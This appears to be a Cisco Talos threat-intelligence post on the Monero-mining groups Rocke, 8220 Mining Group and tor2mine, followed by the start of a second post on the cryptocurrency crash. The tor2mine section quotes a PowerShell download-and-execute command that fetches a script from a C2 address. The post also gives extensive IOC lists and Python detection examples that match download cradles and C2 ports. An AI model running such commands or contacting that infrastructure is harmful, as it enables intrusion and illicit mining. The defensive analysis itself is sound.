We also discovered some actors that share similarities to the aforementioned groups, but we could not connect them via network infrastructure or cryptocurrency wallets. Through investigating all these groups, we determined that combined, they had made hundreds of thousands of dollars in profits.

Rocke/Iron cybercrime group

Cisco Talos wrote about Rocke earlier this year, an actor linked to the Iron Cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure.

In the campaigns we discussed, Rocke targeted vulnerable Apache Struts2 servers in the spring and summer of 2018. Through tracking the actor's wallets and infrastructure, we were able to link them to some additional exploit activity that was reported on by other security firms but in most instances was not attributed to one actor. Through examining these campaigns that were not previously linked, we observed that Rocke has also targeted Jenkins and JBoss servers, continuing to rely on malicious Git repositories, as well as malicious Amazon Machine Images. They have also been expanding their payloads to include malware with worm-like characteristics and destructive ransomware capabilities. Several campaigns used the XHide Process Faker tool.

We have since discovered additional information that suggests that Rocke has been continuing this exploit activity. Since early September, we have observed Rocke exploiting our Struts2 honeypots to download and execute files from their C2 ssvs[.]space. Beginning in late October, we observed this type of activity in our honeypots involving another Rocke C2 as well: sydwzl[.]cn.

The dropped malware includes ELF (Executable and Linkable Format) backdoors, bash scripts to download and execute other malware from Rocke C2s, as well as illicit ELF Monero miners and associated config files.

While keeping an eye on honeypot activity related to Rocke, we have continued to monitor their GitHub account for new activity. In early October, Rocke forked a repository called whatMiner, developed by a Chinese-speaking actor. WhatMiner appears to have been developed by another group called the 8220 Mining Group, which we will discuss below. The readme for the project describes it as "collecting and integrating all different kinds of illicit mining malware."

Git repository for whatMiner

Looking at some of the bash scripts in the repository, it appears that they scan for and exploit vulnerable Redis and Oracle WebLogic servers to download and install Monero miners. The scripts also rely on a variety of Pastebin pages with Base64-encoded scripts in them that download and execute miners and backdoors onto the victim's machines. These malicious scripts and malware masquerade as JPEG files and are hosted on the Chinese-language file-sharing site thyrsi[.]com. The only difference in Rocke's forked version is that they replaced the Monero wallet in the config file with a new one.

While looking through this repository, we found a folder called "sustes." There were three samples in this folder: mr.sh, a bash script that downloads and installs an illicit Monero miner; xm64, an illicit Monero miner; and wt.conf, a config file for the miner. These scripts and malware very closely match the ones we found in our honeypots with the same file names, although the bash script and config file were changed to include Rocke's infrastructure and their Monero wallet.

Many of the samples obtained in our honeypots reached out to the IP 118[.]24[.]150[.]172 over TCP. Rocke's C2, sydwzl[.]cn, also resolves to this IP, as did the domain sbss[.]f3322[.]net, which began experiencing a spike in DNS requests in late October. Two samples with high detection rates submitted to VirusTotal in 2018 made DNS requests for both domains. Both samples also made requests for a file called "TermsHost.exe" from an IP 39[.]108[.]177[.]252, as well as a file called "xmr.txt" from sydwzl[.]cn. In a previous Rocke campaign, we observed a PE32 Monero miner sample called "TermsHost.exe" hosted on their C2 ssvs[.]space and a Monero mining config file called "xmr.txt" on the C2 sydwzl[.]cn.

When we submitted both samples in our ThreatGrid sandbox, they did not make DNS requests for sydwzl[.]cn, but did make GET requests for hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408. The resulting download is an HTML text file of a 301 error message. When we looked at the profile for the user 979040408@qq.com, we observed that they had numerous posts related to Chinese-language hacking and exploit forums, as well as advertisements for distributed denial-of-service (DDoS) services.

Note that Rocke activity tapered off towards the end of the year. Security researchers at Chinese company Alibaba have taken down Rocke infrastructure that was hosted on Alibaba Cloud. In addition, there has not been activity on Rocke's GitHub since November, nor have we seen related samples in our honeypots since that time.

8220 Mining Group

As we previously described, Rocke originally forked a repository called "whatMiner." We believe this tool is linked to another Chinese-speaking, Monero-mining threat actor — 8220 Mining Group — due to the repository's config files' default wallet and infrastructure. Their C2s often communicate over port 8220, earning them the 8220 Mining Group moniker. This group uses some similar TTPs to Rocke.

We first observed the 8220 Mining Group in our Struts2 honeypots in March 2018. Post-exploitation, the actor would issue a cURL request for several different types of malware on their infrastructure over port 8220. The dropped malware included ELF miners, as well as their associated config files with several of 8220 Mining Group's wallets entered in the appropriate fields. This is an example of the type of commands we observed:

We were able to link the infrastructure and wallets observed in the attacks against our honeypots, as well as in the Git repository, with several other campaigns that the 8220 mining group is likely responsible for.

These campaigns illustrate that beyond exploiting Struts2, 8220 Mining Group has also exploited Drupal content management system, Hadoop YARN, Redis, Weblogic and CouchDB. Besides leveraging malicious bash scripts, Git repositories and image sharing services, as in whatMiner, 8220 Mining Group also carried out a long-lasting campaign using malicious Docker images. 8220 Mining Group was able to amass nearly $200,000 worth of Monero through their campaigns.

There were some similarities between the TTPs used by Rocke and 8220 Mining Group in these campaigns. The actors downloaded a malicious file "logo*.jpg" (very similar to Rocke's use of malicious scripts under the file name "logo*.jpg"), which gets executed through the bash shell to deliver XMRig. The actor also employed malicious scripts hosted on .tk TLDs, Pastebin sites, and Git repositories, which we have also observed Rocke employing.

tor2mine

Over the past few years, Talos has been monitoring accesses for tor2web services, which serve as a bridge between the internet and the Tor network, a system that allows users to enable anonymous communication. These services are useful for malware authors because they eliminate the need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and allow the C2 server's IP address to be hidden.

Recently, while searching through telemetry data, we observed malicious activity that leveraged a tor2web gateway to proxy communications to a hidden service for a C2: qm7gmtaagejolddt[.]onion[.]to.
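Two of the network-level indicators in this post, C2 traffic to port 8220 (the 8220 Mining Group section above) and C2 proxied through a tor2web gateway under .onion.to (this section), lend themselves to a simple pass over outbound connection records; the .tk-hosted scripts from the shared TTP list are a third. The Python below is an added example, not Talos detection content: it parses a constructed, space-separated log format (timestamp, source IP, destination host, destination port, URI), which you would map your own proxy or NetFlow export onto, and flags records matching any of the three indicators. Port 3333 is taken from the IOC list; the .onion.link and .onion.cab suffixes are assumed additional tor2web gateways not named in the post, and every address in the sample log is a documentation or test-net value, not a real IOC.

```python
import re
from collections import namedtuple

# One constructed record per outbound connection. The field layout is this
# example's own; map a proxy or NetFlow export onto it before use.
Conn = namedtuple("Conn", "ts src dst_host dst_port uri")

# Indicators from the post: C2s that listen on port 8220 (3333 also appears in
# the IOC list), tor2web gateways that proxy to a hidden service, and scripts
# or miner configs hosted on .tk domains. The .onion.link and .onion.cab
# suffixes are assumed extra gateways, not named in the post.
C2_PORTS = {8220, 3333}
TOR2WEB_SUFFIXES = (".onion.to", ".onion.link", ".onion.cab")
STAGED_FILE = re.compile(r"\.(sh|jpg|ps1|hta|conf|txt|bin)$", re.I)


def parse_conn(line):
    """Parse one space-separated record; the URI is '-' for non-HTTP flows."""
    ts, src, dst_host, dst_port, uri = line.split()
    return Conn(ts, src, dst_host.lower().rstrip("."), int(dst_port), uri)


def reasons_for(conn):
    """Return the indicator names a connection matches (empty when clean)."""
    reasons = []
    if conn.dst_port in C2_PORTS:
        reasons.append("c2-port")
    if conn.dst_host.endswith(TOR2WEB_SUFFIXES):
        reasons.append("tor2web-gateway")
    if conn.dst_host.endswith(".tk") and STAGED_FILE.search(conn.uri):
        reasons.append("tk-staging")
    return reasons


def scan_log(text):
    """Return (source, destination, port, reasons) for every flagged record."""
    alerts = []
    for line in text.strip().splitlines():
        conn = parse_conn(line)
        reasons = reasons_for(conn)
        if reasons:
            alerts.append((conn.src, conn.dst_host, conn.dst_port, reasons))
    return alerts


# Constructed log (RFC 5737 test-net and example.* hosts; nothing here is a
# real IOC). Line 1 is ordinary browsing and must not be flagged.
SAMPLE_LOG = """\
1544180000 10.0.0.5 www.example.com 443 /index.html
1544180012 10.0.0.5 198.51.100.7 8220 /logo4.jpg
1544180030 10.0.0.9 abcdefghijklmnop.onion.to 80 /v1/check1.ps1
1544180041 10.0.0.9 xmr.staging-example.tk 80 /wt.conf
1544180055 10.0.0.5 pool.example.net 3333 -
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The port rule is deliberately narrow: 8220 and 3333 are unusual enough on egress that a hit is worth a look, but any pool or C2 port list needs an allowlist for legitimate internal services before it goes into production.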

It is unclear how the initial exploitation occurs, but at some point in the exploitation process, a PowerShell script is downloaded and executed to install follow-on malware onto the system:

C:\\Windows\\System32\\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://107[.]181[.]187[.]132/v1/check1.ps1'))
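The command line above carries several features that endpoint telemetry (Sysmon process-creation events, EDR command-line logs) can key on: the cmd.exe /c wrapper, the hidden window (-w 1), -NoProfile, -ExecutionPolicy Bypass, and the iex(...DownloadString(...)) download cradle. The Python below is an added example, not Talos code, that scores a process command line against those features and triages a batch; the indicator names, the alert threshold and the sample command lines are this example's own, and the URL in the first sample uses a TEST-NET address rather than the real C2.

```python
import re

# Each indicator maps to one feature of the cradle quoted above. The names
# and the alert threshold are this example's assumptions.
INDICATORS = [
    ("cmd-wrapper",     re.compile(r"\bcmd(\.exe)?\s+/c\s+powershell", re.I)),
    ("hidden-window",   re.compile(r"-w(indowstyle)?\s+(1|hidden)\b", re.I)),
    ("no-profile",      re.compile(r"-nop(rofile)?\b", re.I)),
    ("policy-bypass",   re.compile(r"-e(xecutionpolicy|p)?\s+bypass\b", re.I)),
    ("download-cradle", re.compile(
        r"\b(iex|invoke-expression)\b.*\bdownload(string|file|data)\s*\(", re.I)),
]
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def score_command_line(cmdline):
    """Return the matched indicator names, any URLs, and a verdict.

    A download cradle alone is enough to alert; otherwise three or more of
    the evasion switches together are treated as suspicious, so a single
    -ExecutionPolicy Bypass from a deployment script does not fire.
    """
    hits = [name for name, pattern in INDICATORS if pattern.search(cmdline)]
    urls = URL.findall(cmdline)
    suspicious = "download-cradle" in hits or len(hits) >= 3
    return {"hits": hits, "urls": urls, "suspicious": suspicious}


def triage(cmdlines):
    """Score a batch of process command lines and keep only the alerts."""
    alerts = []
    for cmdline in cmdlines:
        result = score_command_line(cmdline)
        if result["suspicious"]:
            alerts.append((cmdline, result))
    return alerts


# Constructed command lines: the first is shaped like the cradle in the post
# (with a TEST-NET address), the other two are routine administration.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\cmd.exe /c powershell.exe -w 1 -NoProfile -InputFormat None "
    r"-ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient)"
    r".DownloadString('http://192.0.2.10/v1/check1.ps1'))",
    r"powershell.exe -NoProfile -File C:\scripts\nightly-backup.ps1",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\deploy\install-agent.ps1",
]

if __name__ == "__main__":
    for cmdline, result in triage(SAMPLE_CMDLINES):
        print(result["hits"], result["urls"])
```

The extracted URLs are the useful pivot: the post's own investigation went from the script location to the rest of the hosting server's contents and then to earlier campaigns on the same provider.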

We identified additional malware on this IP, which belongs to Total Server Solutions LLC. It appears to include 64-bit and 32-bit variants of XMRigCC (a variant of the XMRig miner); Windows executable versions of publicly available EternalBlue/EternalRomance exploit scripts; an open-source TCP port scanner; and shellcode that downloads and executes a malicious payload from the C2. Additional scripts leverage JavaScript, VBScript, PowerShell and batch scripts to avoid writing executables to the disk.

We began to research the malware and infrastructure used in this campaign. We observed previous research on a similar campaign. This actor was exploiting CVE-2018-11776, an Apache Struts 2 namespace vulnerability. The actor also relied on an IP hosted on Total Server Solutions LLC (107[.]181[.]160[.]197). They also employed a script, "/win/checking-test.hta," that was almost identical to one we saw hosted on the tor2mine actor's C2, "check.hta":

/win/checking-test.hta from previous campaign
check.hta
This actor dropped XMRigCC as a payload, mining to eu[.]minerpool[.]pw, as well. Both campaigns additionally relied on the XHide Process Faker tool.

Similarly, in February 2018, Trend Micro published a report on an actor exploiting an Oracle WebLogic WLS-WSAT vulnerability to drop 64-bit and 32-bit variants of XMRig. The actors used many similar supporting scripts that we observed during the tor2web campaigns, and also used a C2 hosted on Total Server Solutions LLC (hxxp://107[.]181[.]174[.]248). They also mined to eu[.]minerpool[.]pw.

This malware was developed in Python and then converted to ELF executables using the PyInstaller tool for distribution. This is the same technique we observed in a Rocke campaign.

Conclusion

Through tracking the wallets of these groups, we estimate that they hold and have made payments totaling around 1,200 Monero. Based on public reporting, these groups combined had earned hundreds of thousands of dollars worth of cryptocurrency. However, it is difficult to ascertain the exact amount they made since the value of Monero is very volatile and it is difficult to tell the value of the currency when it was sold. We were also unable to track holdings and payments for certain kinds of wallets, such as MinerGate.

The value of Monero has dramatically declined in the past few months. Talos has observed less activity from these actors in our honeypots since November, although cryptocurrency-focused attacks from other actors continue.

There remains the possibility that with the value of cryptocurrencies so low, threat actors will begin delivering different kinds of payloads. For example, Rocke has been observed developing new malware with destructive capabilities that poses as ransomware. However, Rocke's GitHub page shows that, as of early November, they were continuing to fork mining-focused repositories, including a static build of XMRig.

Talos will continue to monitor these groups, as well as cryptocurrency mining-focused attacks in general, to assess what changes, if any, arise from the decline in value of cryptocurrencies.

Coverage

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Rocke

IPs:
121[.]126[.]223[.]211
142[.]44[.]215[.]177
144[.]217[.]61[.]147
118[.]24[.]150[.]172
185[.]133[.]193[.]163

Domains:
xmr.enjoytopic[.]tk
d.paloaltonetworks[.]tk
threatpost[.]tk
3g2upl4pq6kufc4m[.]tk
scan.3g2upl4pq6kufc4m[.]tk
e3sas6tzvehwgpak[.]tk
sample.sydwzl[.]cn
blockbitcoin[.]com
scan.blockbitcoin[.]tk
dazqc4f140wtl[.]cloudfront[.]net
d3goboxon32grk2l[.]tk
enjoytopic[.]tk
realtimenews[.]tk
8282[.]space
3389[.]space
svss[.]space
enjoytopic[.]esy[.]es
lienjoy[.]esy[.]es
d3oxpv9ajpsgxt[.]cloudfront[.]net
d3lvemwrafj7a7[.]cloudfront[.]net
d1ebv77j9rbkp6[.]enjoytopic[.]com
swb[.]one
d1uga3uzpppiit[.]cloudfront[.]net
emsisoft[.]enjoytopic[.]tk
ejectrift[.]censys[.]xyz
scan[.]censys[.]xyz
api[.]leakingprivacy[.]tk
news[.]realnewstime[.]xyz
scan[.]realnewstime[.]xyz
news[.]realtimenews[.]tk
scanaan[.]tk
www[.]qicheqiche[.]com

URLs:
hxxps://github[.]com/yj12ni
hxxps://github[.]com/rocke
hxxps://github[.]com/freebtcminer/
hxxps://github[.]com/tightsoft
hxxps://raw[.]githubusercontent[.]com/ghostevilxp
hxxp://www[.]qicheqiche[.]com
hxxp://123[.]206[.]13[.]220:8899
hxxps://gitee[.]com/c-888/
hxxp://gitlab[.]com/c-18
hxxp://www[.]ssvs[.]space/root[.]bin
hxxp://a[.]ssvs[.]space/db[.]sh
hxxp://a[.]ssvs[.]space/cf[.]cf
hxxp://a[.]ssvs[.]space/pluto
hxxp://ip[.]ssvs[.]space/xm64
hxxp://ip[.]ssvs[.]space/wt[.]conf
hxxp://ip[.]ssvs[.]space/mr[.]sh
hxxp://a[.]ssvs[.]space/logo[.]jpg
hxxp://a[.]sydwzl[.]cn/root[.]bin
hxxp://a[.]sydwzl[.]cn/x86[.]bin
hxxp://a[.]sydwzl[.]cn/bar[.]sh
hxxp://a[.]sydwzl[.]cn/crondb
hxxp://a[.]sydwzl[.]cn/pools[.]txt
hxxps://pastebin[.]com/raw/5bjpjvLP
hxxps://pastebin[.]com/raw/Fj2YdETv
hxxps://pastebin[.]com/raw/eRkrSQfE
hxxps://pastebin[.]com/raw/Gw7mywhC
hxxp://thyrsi[.]com/t6/387/1539580368x-1566688371[.]jpg
hxxp://thyrsi[.]com/t6/387/1539579140x1822611263[.]jpg
hxxp://thyrsi[.]com/t6/387/1539581805x1822611359[.]jpg
hxxp://thyrsi[.]com/t6/387/1539592750x-1566688347[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410750x-1566657908[.]jpg
hxxp://thyrsi[.]com/t6/373/1537410304x-1404764882[.]jpg
hxxp://thyrsi[.]com/t6/377/1538099301x-1404792622[.]jpg
hxxp://thyrsi[.]com/t6/362/1535175343x-1566657675[.]jpg
hxxp://users[.]qzone[.]qq[.]com:80/fcg-bin/cgi_get_portrait.fcg?uins=979040408

SHA-256:
55dbdb84c40d9dc8c5aaf83226ca00a3395292cc8f884bdc523a44c2fd431c7b root.bin
00e1b4874f87d124b465b311e13565a813d93bd13d73b05e6ad9b7a08085b683 root.bin
cdaa31af1f68b0e474ae1eafbf3613eafae50b8d645fef1e64743c937eff31b5 db.sh
959230efa68e0896168478d3540f25adf427c7503d5e7761597f22484fc8a451 cf.cf
d11fa31a1c19a541b51fcc3ff837cd3eec419403619769b3ca69c4137ba41cf3 pluto/xm64
da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 root.bin
2914917348b91c26ffd703dcef2872115e53dc0b71e23ce40ea3f88215fb2b90 wt.conf
b1c585865fdb16f3696626ef831b696745894194be9138ac0eb9f6596547eed9 mr.sh
7de435da46bf6bcd1843410d05c017b0306197462b0ba1d8c84d6551192de259 root.bin
904261488b24dfec2a3c8dee34c12e0ae2cf4722bd06d69af3d1458cd79e8945 logo.jpg
f792db9a05cde2eac63c262735d92f10e2078b6ec299ce519847b1e089069271 root.bin
dcf2b7bf7f0c8b7718e47b0d7269e0d09bb1bdbf6d3248a53ff0e1c9ea5aa38d x86.bin
3074b307958f6b31448006cad398b23f12119a7d0e51f24c5203a291f9e5d0ec bar.sh
a598aa724c45b2d8b98ec9bc34b83f21b7ae73d68d030476ebd9d89fc06afe58 cron.db
74c84e47463fad4128bd4d37c4164fb58e4d7dcd880992fad16f79f20995e07e pools.txt

Samples making DNS requests for sydwzl[.]cn and sbss[.]f3322[.]net:
17c8a1d0e981386730a7536a68f54a7388ed185f5c63aa567d212dc672cf09e0
4347d37b7ea18caacb843064dc31a6cda3c91fa7feb4d046742fd9bd985a8c86

Wallets
rocke@live.cn
44NU2ZadWJuDyVqKvzapAMSe6zR6JE99FQXh2gG4yuANW5fauZm1rPuTuycCPX3D7k2uiNc55SXL3TX8fHrbb9zQAqEM64W
44FUzGBCUrwAzA2et2CRHyD57osHpmfTHAXzbqn2ycxtg2bpk792YCSLU8BPTciVFo9mowjakCLNg81WwXgN2GEtQ4uRuN3
45JymPWP1DeQxxMZNJv9w2bTQ2WJDAmw18wUSryDQa3RPrympJPoUSVcFEDv3bhiMJGWaCD4a3KrFCorJHCMqXJUKApSKDV
88RiksgPZR5C3Z8B51AQQQMy3zF9KFN7zUC5P5x2DYCFa8pUkY3biTQM6kYEDHWpczGMe76PedzZ6KTsrCDVWGXNRHqwGto

8220 Gang

45[.]32[.]39[.]40:8220
45[.]77[.]24[.]16
54[.]37[.]57[.]99:8220
67[.]21[.]81[.]179:8220
67[.]231[.]243[.]10:8220
98[.]142[.]140[.]13:8220
98[.]142[.]140[.]13:3333
98[.]142[.]140[.]13:8888
104[.]129[.]171[.]172:8220
104[.]225[.]147[.]196:8220
128[.]199[.]86[.]57:8220
142[.]4[.]124[.]50:8220
142[.]4[.]124[.]164:8220
158[.]69[.]133[.]17:8220
158[.]69[.]133[.]18:8220
158[.]69[.]133[.]20:3333
162[.]212[.]157[.]244:8220
165[.]227[.]215[.]212:8220
185[.]82[.]218[.]206:8220
192[.]99[.]142[.]226:8220
192[.]99[.]142[.]227
192[.]99[.]142[.]232:8220
192[.]99[.]142[.]235:8220
192[.]99[.]142[.]240:8220
192[.]99[.]142[.]248:8220
192[.]99[.]142[.]249:3333
192[.]99[.]142[.]251:80
192[.]99[.]56[.]117:8220
195[.]123[.]224[.]186:8220
198[.]181[.]41[.]97:8220
202[.]144[.]193[.]110:3333
hxxps://github[.]com/MRdoulestar/whatMiner

1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13
e2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e
31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1
cb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35
cfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e
efbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803
384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52

Samples associated with whatMiner:
f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c
1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04
241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f
3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04

Wallets
41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S

Tor2mine

107[.]181[.]160[.]197
107[.]181[.]174[.]248
107[.]181[.]187[.]132
asq[.]r77vh0[.]pw
194[.]67[.]204[.]189
qm7gmtaagejolddt[.]onion[.]to
res1[.]myrms[.]pw
hxxps://gitlab[.]com/Shtrawban
rig[.]zxcvb[.]pw
back123[.]brasilia[.]me

91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe
44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe
3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe
c3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe
4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1
904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat
4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta
af780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta
cc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1
ee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta
a7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat
0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php
e0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat
b2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1
18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin
1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe
112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1
e1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta
61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1
f1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat
cce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe

Uncategorized groups

188[.]166[.]38[.]137
91[.]121[.]87[.]10
94[.]23[.]206[.]130

46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava
44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Post authored by Nick Biasini.

Executive Summary

As 2018 draws to a close, one technology has definitively left its mark on the year: cryptocurrencies. Digital currencies started the year out strong after a meteoric rise toward the end of 2017. Since then, it's safe to say that cryptocurrencies have had a massive impact globally, especially on the threat landscape. However, 2018 is ending on a sour note for these currencies, as they have been in steady decline, ending in a sudden drop resulting in losses in excess of 75 percent of their value from the highs of late 2017 and early 2018.

Malicious cryptocurrency mining became the new payload of choice for adversaries seeking recurring revenue, dislodging the lump-sum payouts of threats like ransomware from the top of the threat landscape.

But the sudden collapse of the market, after a gradual decline, raises the question about how the threat landscape would be impacted, if at all. Despite conventional wisdom, Cisco Talos hasn't seen a notable shift away from cryptocurrency mining. We have seen pockets of movement, but they have lived explicitly in the email space where both threat distribution and botnets play a crucial role. As 2018 proceeded, adversaries have shifted payloads in the email space away from cryptocurrency mining and toward more modular threats like Emotet and remote access trojans (RATs). Talos is also releasing another blog today outlining some of the campaigns we've seen recently from some well-known actors who have a history with cryptocurrency mining.

After reviewing the real-world impact and associated data, it appears that cryptocurrency mining is not slowing down, and if anything, could be slightly increasing in frequency for certain aspects of the landscape. As we move into 2019, it's likely that the payloads of choice will continue to diverge between different aspects of the threat landscape. Regardless, enterprises need to be prepared to deal with malicious or unauthorized cryptocurrency mining activities on their respective networks, because it's not going away — at least not yet.

Introduction

It's clear, as far as the threat landscape is concerned, 2018 was the year of malicious cryptocurrency mining. Cisco Talos first covered cryptocurrency mining in early 2018, and again at multiple points throughout the year, including a whitepaper discussing the threat and associated coverage. In these attacks, malicious actors inject malware into systems and steal their computing power to "mine" cryptocurrencies. If done on a large scale, this kind of attack could cost enterprises a great deal of energy and resources. And for a personal user, it could significantly slow down their computing power and speed.

At the time, it was clear that actors had started to push quickly into primarily Monero-based cryptocurrency mining as a payload of choice. Since then, we have witnessed one of the most significant shifts in the threat landscape in years — and perhaps ever. Adversaries have gone all in on the idea of the recurring revenue model of cryptocurrency mining instead of the lump-sum gamble that ransomware provided so effectively throughout 2016 and 2017. In ransomware attacks, attackers asked for infected users to pay them a sum of money in exchange for the return of their information. But with miners, the attackers see revenue on a daily basis from their activities.

This mass migration does have its risks, however. Primary among them is the value of the currency being mined. When we first wrote about malicious cryptocurrency mining, an adversary could hope to make about $0.25 per day for a basic home computer. As of the writing of this blog, that value has cratered to a little more than $0.04 per day for that same computer. As you can imagine, this has had an impact on adversaries' bottom lines. It now takes almost six systems to create the same revenue that one generated previously. Before we get too deep into the potential impact, let's discuss the size and scope of the role that cryptocurrency mining had on the threat landscape in 2018. One of the most interesting aspects is how widely this shift was adopted across multiple different attack avenues including spam, web and active exploitation.

Spam and the mining effect

One of the best indicators for how a threat is affecting the threat landscape is spam levels. Much of the spam we see on a daily basis is being generated from botnets, and those botnets are undertaking that activity to generate revenue. This is where we have seen some shifts throughout the year of cryptocurrency mining. As you can see below, the amount of overall spam, excluding two extremely high-volume campaigns early in 2018, is down.

Late in 2017 and continuing into early 2018, spam levels were dropping. Since then, they have begun to rise, and are now approaching the levels seen through most of 2017. This is indicative of botnet functionality shifts, where some of the systems that had previously been used to send spam may have been altered to instead work on cryptocurrency mining. There have been reports throughout the past year of botnets such as Necurs experimenting with cryptocurrency mining instead of spam generation. However, there are two sides to the spam landscape, and they tell two different stories. On one side are those who control the botnets that send spam; on the other are those who use spam as a mechanism to spread their malware.

Adversaries that deliver their malware via spam are a different demographic, and as such, the landscape appears slightly different. Early on in 2018, Talos saw near-constant campaigns delivering malicious cryptocurrency miners directly or using a downloader. As the year progressed, and more recently as the price of cryptocurrencies began to waver, we are seeing adversaries push into different areas, delivering different payloads.

Emotet became one of the big winners as cryptocurrency miners waned. We have seen Emotet continue to be delivered in large numbers when active. Emotet continues to be a highly effective, modular payload that contains several functions, now including ransomware. These types of modular malware frameworks that allow adversaries to deliver varied payloads are going to continue to rise in popularity, as the final payload can depend on a lot of external factors. Today, when looking at the spam landscape, you do periodically see campaigns delivering miners, but they are far less common than they were earlier in 2018. Now, you are more likely to find a RAT or a modular threat like Emotet than a miner. Cryptocurrency mining has had a marked impact on the email threat landscape in 2018, but email is just one of the key indicators on the threat landscape. Next, we'll take a look at web-based attacks.

Web

Web-based attacks continue to be heavily leveraged by attackers to compromise systems around the world. In previous years, exploit kits and malvertising campaigns were used to distribute ransomware and other threats to compromised systems. Since late 2016, there has been a marked decline in global exploit kit activity. Of the campaigns that remained, malicious cryptomining payloads were being distributed commonly via downloaders, rather than some of the other malware that had been historically associated with these campaigns. Along with exploit kits and malvertising, cryptocurrency mining malware was also frequently seen being delivered through fake Flash Player updates. In these attacks, victims are prompted to update their version of Adobe Flash Player, but the malware downloads a payload used to infect systems and mine cryptocurrency for cybercriminals.

